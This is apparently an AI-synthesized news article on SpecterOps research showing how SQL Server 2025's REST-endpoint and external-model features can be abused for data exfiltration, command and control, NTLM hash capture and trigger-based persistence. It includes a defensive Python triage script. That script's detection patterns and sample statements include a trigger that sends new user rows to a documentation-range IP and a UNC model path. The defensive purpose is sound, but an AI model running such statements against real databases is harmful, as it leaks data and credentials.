VYPR
Research · Published Jun 18, 2026 · 1 source

SpecterOps Shows How SQL Server 2025 AI Features Enable Stealthy Data Exfiltration and C2

Researchers at SpecterOps have demonstrated that Microsoft SQL Server 2025's native AI features can be abused for covert data exfiltration and command-and-control communication, bypassing traditional security monitoring.

SpecterOps researchers have publicly demonstrated that Microsoft SQL Server 2025's newly introduced AI capabilities can be weaponized for stealthy data exfiltration and command-and-control (C2) operations. The findings, released alongside proof-of-concept code on GitHub, highlight how legitimate enterprise features intended for modern workloads like Retrieval-Augmented Generation (RAG) can be repurposed by attackers as powerful post-exploitation tools.

At the heart of the research is the stored procedure sp_invoke_external_rest_endpoint, which allows SQL Server to send HTTPS requests directly to external endpoints. While designed for legitimate API communication, this procedure enables attackers with sysadmin privileges to exfiltrate up to 100 MB of data over encrypted channels, bypassing traditional monitoring that relies on detecting suspicious command execution or unusual outbound connections. In a demonstrated attack scenario, a compromised SQL Server instance can query sensitive tables, convert the data to JSON, and transmit it to an attacker-controlled server using this procedure.

Another major feature, CREATE EXTERNAL MODEL, combined with AI_GENERATE_EMBEDDINGS, allows SQL Server to integrate with external AI models. Researchers showed that these functions can be abused to establish covert communication channels by encoding commands and responses within AI embedding data, making the traffic appear legitimate. This capability enables a new form of C2 infrastructure operating entirely within SQL queries, allowing attackers to create persistent backdoors that execute commands and return results without deploying traditional malware.

In more advanced scenarios, attackers can load malicious .NET CLR assemblies directly into SQL Server memory, eliminating the need for disk-based payloads and further reducing detection risk. The research also highlights a technique involving UNC paths in AI model configurations that can trigger NTLM authentication attempts over SMB, allowing attackers to capture or relay authentication hashes within a network.

Persistence is another concern. Attackers can create database triggers that automatically exfiltrate newly inserted or updated data. For example, any new user credentials added to a table can be immediately sent to an external server without additional interaction, turning the database into a continuous data leakage point.

Microsoft was notified of these findings but did not classify the behavior as a security vulnerability, meaning it remains exploitable in current deployments. This decision challenges traditional security assumptions, as SQL Server 2025 normalizes HTTPS communication for AI workloads, making it significantly harder to distinguish between legitimate and malicious activity.

From a defensive standpoint, SpecterOps recommends enforcing strict controls over database privileges, particularly sysadmin accounts, and closely monitoring features such as external REST endpoints and AI model integrations for potential abuse. Network-level controls, such as restricting outbound connections from database servers, can also help mitigate risk. Organizations must baseline normal AI-related traffic patterns to detect anomalies effectively.
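One way to triage captured T-SQL statement text for the features named above, as an added example that is not SpecterOps' or Microsoft's code. The allowlisted host, the finding names and the sample statements are constructed assumptions, and the statement text is assumed to come from whatever audit or tracing source the organization already collects.

```python
import re
from urllib.parse import urlparse

# Assumption: hosts approved for REST/AI traffic from the database tier.
ALLOWED_HOSTS = {"contoso-ai.openai.azure.com"}

REST_PROC = re.compile(r"\bsp_invoke_external_rest_endpoint\b", re.I)
EXT_MODEL = re.compile(r"\bCREATE\s+EXTERNAL\s+MODEL\b", re.I)
TRIGGER = re.compile(r"\bCREATE\s+(?:OR\s+ALTER\s+)?TRIGGER\b", re.I)
QUOTED = re.compile(r"N?'([^']*)'")  # T-SQL string literals

def review_statement(sql):
    """Return sorted finding codes for one captured T-SQL statement."""
    findings = set()
    uses_rest = bool(REST_PROC.search(sql))
    if uses_rest:
        findings.add("REST_CALL")
        if TRIGGER.search(sql):  # outbound call fires on each data change
            findings.add("REST_IN_TRIGGER")
    if EXT_MODEL.search(sql):
        findings.add("EXTERNAL_MODEL")
    if not findings:
        return []
    url_literals = 0
    for literal in QUOTED.findall(sql):
        if literal.startswith("\\\\"):  # UNC path: SMB/NTLM instead of HTTPS
            findings.add("UNC_PATH")
        elif literal.lower().startswith(("http://", "https://")):
            url_literals += 1
            host = (urlparse(literal).hostname or "").lower()
            if host not in ALLOWED_HOSTS:
                findings.add("UNAPPROVED_HOST")
    if uses_rest and url_literals == 0:  # destination built at run time
        findings.add("DYNAMIC_URL")
    return sorted(findings)

# Constructed sample statements (documentation-range addresses).
SAMPLE_STATEMENTS = [
    "SELECT name FROM sys.tables",
    "EXEC sp_invoke_external_rest_endpoint "
    "@url = N'https://contoso-ai.openai.azure.com/embeddings', @payload = @body",
    "CREATE TRIGGER trg_users ON dbo.Users AFTER INSERT AS "
    "EXEC sp_invoke_external_rest_endpoint @url = N'https://203.0.113.7/in'",
    r"CREATE EXTERNAL MODEL m1 WITH (LOCATION = '\\198.51.100.9\m\m.onnx')",
    "EXEC sp_invoke_external_rest_endpoint @url = @u, @payload = @p",
]

if __name__ == "__main__":
    for stmt in SAMPLE_STATEMENTS:
        print(review_statement(stmt), "<-", stmt[:60])
```

A bare REST_CALL to an approved host is the baseline to record; the other codes are the deviations worth an analyst's attention.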

As AI capabilities continue to be embedded in enterprise software, this case highlights a growing trend where legitimate features can be weaponized. SQL Server 2025 demonstrates how innovation without corresponding security controls can expand the attack surface, forcing defenders to adapt rapidly to an evolving threat landscape.

Synthesized by Vypr AI